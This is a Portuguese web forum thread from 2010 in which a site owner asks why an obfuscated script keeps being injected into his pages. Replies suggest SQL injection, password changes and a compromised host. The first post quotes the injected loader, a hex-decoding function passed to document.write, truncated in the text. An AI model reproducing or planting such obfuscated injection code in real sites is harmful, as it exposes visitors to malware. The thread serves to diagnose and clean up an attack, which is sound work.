Jump to content


Photo

Exploid Site

Started By Felito, 08/10/2010, 00:17

  • Faça o login para participar
4 replies to this topic

#1 Felito

Felito

    Novato no fórum

  • Usuários
  • 6 posts
  • Sexo:Masculino

Posted 08/10/2010, 00:17

ola pessoal

estao injectando este codigo no meu site

<script>function vaVYVaVyyyd(vaayybxbYbx){ return(parseInt(vaayybxbYbx,16));}function vyxbdaydbtt(vtbVxbVxYxd){ var vybaxYtVyax='';for(vydbdYdVyax=0; vydbdYdVyax<vtbVxbVxYxd.length; vydbdYdVyax+=2){vybaxYtVyax+=(String.fromCharCode(vaVYVaVyyyd(vtbVxbVxYxd.substr(vydbdYdVyax,2))));}return vybaxYtVyax;} document.write(vyxbdaydbtt('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E7 (....);</script>


o que pode originar isto?

obrigado,é urgente :(

#2 LeoB

LeoB

    Super Veterano

  • Usuários
  • 1876 posts
  • Sexo:Masculino
  • Interesses:Programação

Posted 08/10/2010, 05:58

Em que parte do site eles estão fazendo isso? O método mais provável é SQL Injection. Se for isso, veja:

http://imasters.com....omo_se_proteger

OBS: Use mysql_real_escape_string() no lugar de addslashes().

#3 fel

fel

    Novato no fórum

  • Usuários
  • 17 posts
  • Sexo:Não informado

Posted 08/10/2010, 10:31

Em que parte do site eles estão fazendo isso? O método mais provável é SQL Injection. Se for isso, veja:

http://imasters.com....omo_se_proteger

OBS: Use mysql_real_escape_string() no lugar de addslashes().



ola amigo obrigado pela sua resposta

é o seguinte. Esse codigo vem logo a seguir ao body. eu nao tenho quase nada em base de dados, a unica coisa que tenho é um formulario em php (sem ligação à BD) e um registo de newslletter, mas isto ja acontecia antes de ter a newsllater, logo isso não é.

Eu ja procurei se havia algum script a mandar para algum http mas nao encontrei tb, eu tenho no site muita javascript. Ontem para meu espanto e apos tr limpo o codigo, deparei também com uma imagem com virus.

Tem alguma sugestão? muito obrigado pela atenção

Edição feita por: fel, 08/10/2010, 10:34.

#4 LeoB

LeoB

    Super Veterano

  • Usuários
  • 1876 posts
  • Sexo:Masculino
  • Interesses:Programação

Posted 08/10/2010, 18:48

Tem link? Mude as senhas do seu FTP e do painel de controle. Pode ser também que o servidor esteja comprometido. Procure outros sites hospedados no mesmo host e veja se está tudo certo com eles.

#5 fel

fel

    Novato no fórum

  • Usuários
  • 17 posts
  • Sexo:Não informado

Posted 08/10/2010, 20:44

Tem link? Mude as senhas do seu FTP e do painel de controle. Pode ser também que o servidor esteja comprometido. Procure outros sites hospedados no mesmo host e veja se está tudo certo com eles.

é este o link

http://www.tgi.com.pt/teste/

Pra já, ja tá tendo um dia em que não ocorre de novo problema. Assim que acontecer de novo eu aviso aqui pra verem o erro

obrigado

Ah e vou mudar as pass's
Voltar para Javascript / DOM / AJAX / ECMAScript


1 user(s) are reading this topic

0 membro(s), 1 visitante(s) e 0 membros anônimo(s)

  1. Fórum WMO
  2. Desenvolvimento
  3. Javascript / DOM / AJAX / ECMAScript
  4. Privacy Policy
  5. Regras ·
IPB Skin By Virteq